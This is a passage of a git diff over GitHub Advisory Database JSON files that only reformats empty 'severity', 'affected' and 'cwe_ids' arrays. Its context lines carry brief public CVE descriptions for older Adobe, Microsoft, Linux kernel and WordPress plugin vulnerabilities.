b/advisories/unreviewed/2022/05/GHSA-5f5w-vcxh-m5gf/GHSA-5f5w-vcxh-m5gf.json index 5c07114a203..a2fafaa3b9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-5f5w-vcxh-m5gf/GHSA-5f5w-vcxh-m5gf.json +++ b/advisories/unreviewed/2022/05/GHSA-5f5w-vcxh-m5gf/GHSA-5f5w-vcxh-m5gf.json @@ -7,12 +7,8 @@ "CVE-2015-6724" ], "details": "The ANSendForApproval method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6722, CVE-2015-6723, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5fhf-5pr4-45fx/GHSA-5fhf-5pr4-45fx.json b/advisories/unreviewed/2022/05/GHSA-5fhf-5pr4-45fx/GHSA-5fhf-5pr4-45fx.json index 474e2ad4a08..4180fd37e40 100644 --- a/advisories/unreviewed/2022/05/GHSA-5fhf-5pr4-45fx/GHSA-5fhf-5pr4-45fx.json +++ b/advisories/unreviewed/2022/05/GHSA-5fhf-5pr4-45fx/GHSA-5fhf-5pr4-45fx.json @@ -7,12 +7,8 @@ "CVE-2012-0725" ], "details": "Adobe Flash Player before 11.2.202.229 in Google Chrome before 18.0.1025.151 allow attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2012-0724.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5g5x-38wg-3rxr/GHSA-5g5x-38wg-3rxr.json b/advisories/unreviewed/2022/05/GHSA-5g5x-38wg-3rxr/GHSA-5g5x-38wg-3rxr.json index 10ffd65ca3f..c0d509b8039 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g5x-38wg-3rxr/GHSA-5g5x-38wg-3rxr.json +++ b/advisories/unreviewed/2022/05/GHSA-5g5x-38wg-3rxr/GHSA-5g5x-38wg-3rxr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5jvx-wxpf-6w9q/GHSA-5jvx-wxpf-6w9q.json b/advisories/unreviewed/2022/05/GHSA-5jvx-wxpf-6w9q/GHSA-5jvx-wxpf-6w9q.json index d87ba404688..f011947cda3 100644 --- a/advisories/unreviewed/2022/05/GHSA-5jvx-wxpf-6w9q/GHSA-5jvx-wxpf-6w9q.json +++ b/advisories/unreviewed/2022/05/GHSA-5jvx-wxpf-6w9q/GHSA-5jvx-wxpf-6w9q.json @@ -7,12 +7,8 @@ "CVE-2015-3095" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-5087, CVE-2015-5094, CVE-2015-5100, CVE-2015-5102, CVE-2015-5103, CVE-2015-5104, and CVE-2015-5115.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5m29-c83w-r9hf/GHSA-5m29-c83w-r9hf.json b/advisories/unreviewed/2022/05/GHSA-5m29-c83w-r9hf/GHSA-5m29-c83w-r9hf.json index 5bdbb1013d2..c43a947fafb 100644 --- a/advisories/unreviewed/2022/05/GHSA-5m29-c83w-r9hf/GHSA-5m29-c83w-r9hf.json +++ b/advisories/unreviewed/2022/05/GHSA-5m29-c83w-r9hf/GHSA-5m29-c83w-r9hf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5m3q-gvv2-4mx2/GHSA-5m3q-gvv2-4mx2.json b/advisories/unreviewed/2022/05/GHSA-5m3q-gvv2-4mx2/GHSA-5m3q-gvv2-4mx2.json index ca3a840d039..53ec5b04849 100644 --- a/advisories/unreviewed/2022/05/GHSA-5m3q-gvv2-4mx2/GHSA-5m3q-gvv2-4mx2.json +++ b/advisories/unreviewed/2022/05/GHSA-5m3q-gvv2-4mx2/GHSA-5m3q-gvv2-4mx2.json @@ -7,12 +7,8 @@ "CVE-2015-5090" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and perform a transition from Low Integrity to Medium Integrity via unspecified vectors, a different vulnerability than CVE-2015-4446 and CVE-2015-5106.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5mr8-8jjp-hr27/GHSA-5mr8-8jjp-hr27.json b/advisories/unreviewed/2022/05/GHSA-5mr8-8jjp-hr27/GHSA-5mr8-8jjp-hr27.json index 999942ecc52..77c87901157 100644 --- a/advisories/unreviewed/2022/05/GHSA-5mr8-8jjp-hr27/GHSA-5mr8-8jjp-hr27.json +++ b/advisories/unreviewed/2022/05/GHSA-5mr8-8jjp-hr27/GHSA-5mr8-8jjp-hr27.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5p5f-7qvc-xw5j/GHSA-5p5f-7qvc-xw5j.json b/advisories/unreviewed/2022/05/GHSA-5p5f-7qvc-xw5j/GHSA-5p5f-7qvc-xw5j.json index 585464f99ff..bdc5f6955fc 100644 --- a/advisories/unreviewed/2022/05/GHSA-5p5f-7qvc-xw5j/GHSA-5p5f-7qvc-xw5j.json +++ b/advisories/unreviewed/2022/05/GHSA-5p5f-7qvc-xw5j/GHSA-5p5f-7qvc-xw5j.json @@ -7,12 +7,8 @@ "CVE-2015-7829" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows mishandle junctions in the Synchronizer directory, which allows attackers to delete arbitrary files via Adobe Collaboration Sync, a related issue to CVE-2015-2428.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5pv9-vw8r-7rx3/GHSA-5pv9-vw8r-7rx3.json b/advisories/unreviewed/2022/05/GHSA-5pv9-vw8r-7rx3/GHSA-5pv9-vw8r-7rx3.json index 2b5b15b1ae8..56c35bbf7f3 100644 --- a/advisories/unreviewed/2022/05/GHSA-5pv9-vw8r-7rx3/GHSA-5pv9-vw8r-7rx3.json +++ b/advisories/unreviewed/2022/05/GHSA-5pv9-vw8r-7rx3/GHSA-5pv9-vw8r-7rx3.json @@ -7,12 +7,8 @@ "CVE-2015-6691" ], "details": "Use-after-free vulnerability in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6690, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5q52-qc74-58ch/GHSA-5q52-qc74-58ch.json b/advisories/unreviewed/2022/05/GHSA-5q52-qc74-58ch/GHSA-5q52-qc74-58ch.json index 7b4dee4e39c..056f703902d 100644 --- a/advisories/unreviewed/2022/05/GHSA-5q52-qc74-58ch/GHSA-5q52-qc74-58ch.json +++ b/advisories/unreviewed/2022/05/GHSA-5q52-qc74-58ch/GHSA-5q52-qc74-58ch.json @@ -7,12 +7,8 @@ "CVE-2015-2321" ], "details": "Cross-site scripting (XSS) vulnerability in the Job Manager plugin 0.7.22 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the email field.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5q64-3jhr-xr4j/GHSA-5q64-3jhr-xr4j.json b/advisories/unreviewed/2022/05/GHSA-5q64-3jhr-xr4j/GHSA-5q64-3jhr-xr4j.json index 5a9273b5bbf..6d7db4ef7e6 100644 --- a/advisories/unreviewed/2022/05/GHSA-5q64-3jhr-xr4j/GHSA-5q64-3jhr-xr4j.json +++ b/advisories/unreviewed/2022/05/GHSA-5q64-3jhr-xr4j/GHSA-5q64-3jhr-xr4j.json @@ -7,12 +7,8 @@ "CVE-2012-2423" ], "details": "The intu-help-qb (aka Intuit Help System Async Pluggable Protocol) handlers in HelpAsyncPluggableProtocol.dll in Intuit QuickBooks 2009 through 2012, when Internet Explorer is used, provide different responses to remote requests depending on whether a ZIP pathname is valid, which allows remote attackers to obtain potentially sensitive information about the installation path and product version via a series of requests involving the Msxml2.XMLHTTP object.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5rv2-456x-92r5/GHSA-5rv2-456x-92r5.json b/advisories/unreviewed/2022/05/GHSA-5rv2-456x-92r5/GHSA-5rv2-456x-92r5.json index e0eac368667..a8423b13a10 100644 --- a/advisories/unreviewed/2022/05/GHSA-5rv2-456x-92r5/GHSA-5rv2-456x-92r5.json +++ b/advisories/unreviewed/2022/05/GHSA-5rv2-456x-92r5/GHSA-5rv2-456x-92r5.json @@ -7,12 +7,8 @@ "CVE-2013-3236" ], "details": "The vmci_transport_dgram_dequeue function in net/vmw_vsock/vmci_transport.c in the Linux kernel before 3.9-rc7 does not properly initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5vvc-wv25-82fx/GHSA-5vvc-wv25-82fx.json b/advisories/unreviewed/2022/05/GHSA-5vvc-wv25-82fx/GHSA-5vvc-wv25-82fx.json index c0d37762eb5..60815b567c5 100644 --- a/advisories/unreviewed/2022/05/GHSA-5vvc-wv25-82fx/GHSA-5vvc-wv25-82fx.json +++ b/advisories/unreviewed/2022/05/GHSA-5vvc-wv25-82fx/GHSA-5vvc-wv25-82fx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5w93-xgv6-rpgw/GHSA-5w93-xgv6-rpgw.json b/advisories/unreviewed/2022/05/GHSA-5w93-xgv6-rpgw/GHSA-5w93-xgv6-rpgw.json index 28504b9223a..bab09b5c927 100644 --- a/advisories/unreviewed/2022/05/GHSA-5w93-xgv6-rpgw/GHSA-5w93-xgv6-rpgw.json +++ b/advisories/unreviewed/2022/05/GHSA-5w93-xgv6-rpgw/GHSA-5w93-xgv6-rpgw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5xhf-rj7x-hqqx/GHSA-5xhf-rj7x-hqqx.json b/advisories/unreviewed/2022/05/GHSA-5xhf-rj7x-hqqx/GHSA-5xhf-rj7x-hqqx.json index fa003205c40..fabf6f76e22 100644 --- a/advisories/unreviewed/2022/05/GHSA-5xhf-rj7x-hqqx/GHSA-5xhf-rj7x-hqqx.json +++ b/advisories/unreviewed/2022/05/GHSA-5xhf-rj7x-hqqx/GHSA-5xhf-rj7x-hqqx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-629f-ccmh-g32f/GHSA-629f-ccmh-g32f.json b/advisories/unreviewed/2022/05/GHSA-629f-ccmh-g32f/GHSA-629f-ccmh-g32f.json index 8d6237d6ab6..77a2166a6a7 100644 --- a/advisories/unreviewed/2022/05/GHSA-629f-ccmh-g32f/GHSA-629f-ccmh-g32f.json +++ b/advisories/unreviewed/2022/05/GHSA-629f-ccmh-g32f/GHSA-629f-ccmh-g32f.json @@ -7,12 +7,8 @@ "CVE-2015-5085" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4445, CVE-2015-4447, CVE-2015-4451, CVE-2015-4452, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-64pv-vr32-fqfm/GHSA-64pv-vr32-fqfm.json b/advisories/unreviewed/2022/05/GHSA-64pv-vr32-fqfm/GHSA-64pv-vr32-fqfm.json index b33b5263191..e233a117397 100644 --- a/advisories/unreviewed/2022/05/GHSA-64pv-vr32-fqfm/GHSA-64pv-vr32-fqfm.json +++ b/advisories/unreviewed/2022/05/GHSA-64pv-vr32-fqfm/GHSA-64pv-vr32-fqfm.json @@ -7,12 +7,8 @@ "CVE-2015-6690" ], "details": "Use-after-free vulnerability in the popUpMenuEx method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to execute arbitrary code via crafted arguments, a different vulnerability than CVE-2015-5586, CVE-2015-6683, CVE-2015-6684, CVE-2015-6687, CVE-2015-6688, CVE-2015-6689, CVE-2015-6691, CVE-2015-7615, CVE-2015-7617, and CVE-2015-7621.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-658p-hh5r-7qvp/GHSA-658p-hh5r-7qvp.json b/advisories/unreviewed/2022/05/GHSA-658p-hh5r-7qvp/GHSA-658p-hh5r-7qvp.json index 1a80908d0cb..9c83e88a378 100644 --- a/advisories/unreviewed/2022/05/GHSA-658p-hh5r-7qvp/GHSA-658p-hh5r-7qvp.json +++ b/advisories/unreviewed/2022/05/GHSA-658p-hh5r-7qvp/GHSA-658p-hh5r-7qvp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-65x9-x5m2-cp2g/GHSA-65x9-x5m2-cp2g.json b/advisories/unreviewed/2022/05/GHSA-65x9-x5m2-cp2g/GHSA-65x9-x5m2-cp2g.json index 4c1bbe5a56a..9ff906661e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-65x9-x5m2-cp2g/GHSA-65x9-x5m2-cp2g.json +++ b/advisories/unreviewed/2022/05/GHSA-65x9-x5m2-cp2g/GHSA-65x9-x5m2-cp2g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-66c2-mp25-238j/GHSA-66c2-mp25-238j.json b/advisories/unreviewed/2022/05/GHSA-66c2-mp25-238j/GHSA-66c2-mp25-238j.json index 01b9e6ba4d1..deb331593e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-66c2-mp25-238j/GHSA-66c2-mp25-238j.json +++ b/advisories/unreviewed/2022/05/GHSA-66c2-mp25-238j/GHSA-66c2-mp25-238j.json @@ -7,12 +7,8 @@ "CVE-2011-4612" ], "details": "icecast before 2.3.3 allows remote attackers to inject control characters such as newlines into the error loc (error.log) via a crafted URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-672w-754p-3r43/GHSA-672w-754p-3r43.json b/advisories/unreviewed/2022/05/GHSA-672w-754p-3r43/GHSA-672w-754p-3r43.json index e8c6f50cea8..16c10744b34 100644 --- a/advisories/unreviewed/2022/05/GHSA-672w-754p-3r43/GHSA-672w-754p-3r43.json +++ b/advisories/unreviewed/2022/05/GHSA-672w-754p-3r43/GHSA-672w-754p-3r43.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-684p-g32j-92wp/GHSA-684p-g32j-92wp.json b/advisories/unreviewed/2022/05/GHSA-684p-g32j-92wp/GHSA-684p-g32j-92wp.json index 58c6ecbb8b2..c44b4df937a 100644 --- a/advisories/unreviewed/2022/05/GHSA-684p-g32j-92wp/GHSA-684p-g32j-92wp.json +++ b/advisories/unreviewed/2022/05/GHSA-684p-g32j-92wp/GHSA-684p-g32j-92wp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-68vw-f384-v6m6/GHSA-68vw-f384-v6m6.json b/advisories/unreviewed/2022/05/GHSA-68vw-f384-v6m6/GHSA-68vw-f384-v6m6.json index a25ff2625da..21647260c88 100644 --- a/advisories/unreviewed/2022/05/GHSA-68vw-f384-v6m6/GHSA-68vw-f384-v6m6.json +++ b/advisories/unreviewed/2022/05/GHSA-68vw-f384-v6m6/GHSA-68vw-f384-v6m6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6942-qcvw-qmh7/GHSA-6942-qcvw-qmh7.json b/advisories/unreviewed/2022/05/GHSA-6942-qcvw-qmh7/GHSA-6942-qcvw-qmh7.json index 7e54b55a508..2bca5625fa5 100644 --- a/advisories/unreviewed/2022/05/GHSA-6942-qcvw-qmh7/GHSA-6942-qcvw-qmh7.json +++ b/advisories/unreviewed/2022/05/GHSA-6942-qcvw-qmh7/GHSA-6942-qcvw-qmh7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-69jx-w8vg-fwxr/GHSA-69jx-w8vg-fwxr.json b/advisories/unreviewed/2022/05/GHSA-69jx-w8vg-fwxr/GHSA-69jx-w8vg-fwxr.json index 73acce8fbd4..7f07c867069 100644 --- a/advisories/unreviewed/2022/05/GHSA-69jx-w8vg-fwxr/GHSA-69jx-w8vg-fwxr.json +++ b/advisories/unreviewed/2022/05/GHSA-69jx-w8vg-fwxr/GHSA-69jx-w8vg-fwxr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-69p2-xp3c-ff6j/GHSA-69p2-xp3c-ff6j.json b/advisories/unreviewed/2022/05/GHSA-69p2-xp3c-ff6j/GHSA-69p2-xp3c-ff6j.json index 059777bd8db..8dd1b399618 100644 --- a/advisories/unreviewed/2022/05/GHSA-69p2-xp3c-ff6j/GHSA-69p2-xp3c-ff6j.json +++ b/advisories/unreviewed/2022/05/GHSA-69p2-xp3c-ff6j/GHSA-69p2-xp3c-ff6j.json @@ -7,12 +7,8 @@ "CVE-2015-2418" ], "details": "Race condition in Microsoft Malicious Software Removal Tool (MSRT) before 5.26 allows local users to gain privileges via a crafted DLL, aka \"MSRT Race Condition Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6cwp-ghjg-988r/GHSA-6cwp-ghjg-988r.json b/advisories/unreviewed/2022/05/GHSA-6cwp-ghjg-988r/GHSA-6cwp-ghjg-988r.json index 42d8800afc6..433c6d5b1c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-6cwp-ghjg-988r/GHSA-6cwp-ghjg-988r.json +++ b/advisories/unreviewed/2022/05/GHSA-6cwp-ghjg-988r/GHSA-6cwp-ghjg-988r.json @@ -7,12 +7,8 @@ "CVE-2015-6702" ], "details": "The createSquareMesh function in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information from process memory via invalid arguments, a different vulnerability than CVE-2015-6697, CVE-2015-6699, CVE-2015-6700, CVE-2015-6701, CVE-2015-6703, and CVE-2015-6704.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6f2q-r54j-7c2c/GHSA-6f2q-r54j-7c2c.json b/advisories/unreviewed/2022/05/GHSA-6f2q-r54j-7c2c/GHSA-6f2q-r54j-7c2c.json index b92b9ff1091..92371ee44fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-6f2q-r54j-7c2c/GHSA-6f2q-r54j-7c2c.json +++ b/advisories/unreviewed/2022/05/GHSA-6f2q-r54j-7c2c/GHSA-6f2q-r54j-7c2c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6gfq-3vj9-82cc/GHSA-6gfq-3vj9-82cc.json b/advisories/unreviewed/2022/05/GHSA-6gfq-3vj9-82cc/GHSA-6gfq-3vj9-82cc.json index 3f2c9e34a75..c0078d513c2 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gfq-3vj9-82cc/GHSA-6gfq-3vj9-82cc.json +++ b/advisories/unreviewed/2022/05/GHSA-6gfq-3vj9-82cc/GHSA-6gfq-3vj9-82cc.json @@ -7,12 +7,8 @@ "CVE-2011-0347" ], "details": "Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6gmw-hfp8-7f52/GHSA-6gmw-hfp8-7f52.json b/advisories/unreviewed/2022/05/GHSA-6gmw-hfp8-7f52/GHSA-6gmw-hfp8-7f52.json index f77b5079b35..13264e23930 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gmw-hfp8-7f52/GHSA-6gmw-hfp8-7f52.json +++ b/advisories/unreviewed/2022/05/GHSA-6gmw-hfp8-7f52/GHSA-6gmw-hfp8-7f52.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6h4g-36qw-4762/GHSA-6h4g-36qw-4762.json b/advisories/unreviewed/2022/05/GHSA-6h4g-36qw-4762/GHSA-6h4g-36qw-4762.json index 5b63987ecce..c8e1322ee0f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6h4g-36qw-4762/GHSA-6h4g-36qw-4762.json +++ b/advisories/unreviewed/2022/05/GHSA-6h4g-36qw-4762/GHSA-6h4g-36qw-4762.json @@ -7,12 +7,8 @@ "CVE-2015-4452" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4445, CVE-2015-4447, CVE-2015-4451, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6hf6-rvjw-mcvv/GHSA-6hf6-rvjw-mcvv.json b/advisories/unreviewed/2022/05/GHSA-6hf6-rvjw-mcvv/GHSA-6hf6-rvjw-mcvv.json index 3d7b8139ae4..28848d15259 100644 --- a/advisories/unreviewed/2022/05/GHSA-6hf6-rvjw-mcvv/GHSA-6hf6-rvjw-mcvv.json +++ b/advisories/unreviewed/2022/05/GHSA-6hf6-rvjw-mcvv/GHSA-6hf6-rvjw-mcvv.json @@ -7,12 +7,8 @@ "CVE-2011-0094" ], "details": "Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka \"Layouts Handling Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6hvr-vx96-6xm3/GHSA-6hvr-vx96-6xm3.json b/advisories/unreviewed/2022/05/GHSA-6hvr-vx96-6xm3/GHSA-6hvr-vx96-6xm3.json index 5207d3eafda..9bdfcb8d9e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-6hvr-vx96-6xm3/GHSA-6hvr-vx96-6xm3.json +++ b/advisories/unreviewed/2022/05/GHSA-6hvr-vx96-6xm3/GHSA-6hvr-vx96-6xm3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6m72-54p2-ff56/GHSA-6m72-54p2-ff56.json b/advisories/unreviewed/2022/05/GHSA-6m72-54p2-ff56/GHSA-6m72-54p2-ff56.json index a37ce3078d4..cd5721dc081 100644 --- a/advisories/unreviewed/2022/05/GHSA-6m72-54p2-ff56/GHSA-6m72-54p2-ff56.json +++ 